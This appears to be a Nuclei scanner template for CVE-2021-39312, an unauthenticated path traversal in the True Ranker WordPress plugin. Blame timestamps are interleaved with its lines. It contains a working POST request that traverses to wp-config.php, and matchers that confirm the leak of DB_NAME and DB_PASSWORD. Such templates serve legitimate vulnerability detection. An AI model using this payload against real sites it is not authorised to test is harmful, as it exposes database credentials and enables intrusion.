2022-05-01 10:38:22 +00:00
id : CVE-2021-39312
info :
2022-05-01 10:40:55 +00:00
name : True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal
2022-05-01 10:38:22 +00:00
author : DhiyaneshDK
severity : high
description : The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file.
remediation : Fixed in version 2.2.4
reference :
- https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79
- https://nvd.nist.gov/vuln/detail/CVE-2021-39312
2022-05-02 19:35:45 +00:00
tags : lfi,wp,wordpress,wp-plugin,unauth,lfr,cve,cve2021
2022-05-02 19:44:49 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.50
cve-id : CVE-2021-39312
cwe-id : CWE-22,CWE-22
2022-05-01 10:38:22 +00:00
requests :
- raw :
- |
POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php
2022-05-02 19:35:45 +00:00
2022-05-01 10:38:22 +00:00
matchers-condition : and
matchers :
- type : word
2022-05-02 19:35:45 +00:00
part : body
2022-05-01 10:38:22 +00:00
words :
2022-05-02 19:35:45 +00:00
- "DB_NAME"
- "DB_PASSWORD"
condition : and
2022-05-01 10:38:22 +00:00
- type : status
status :
- 200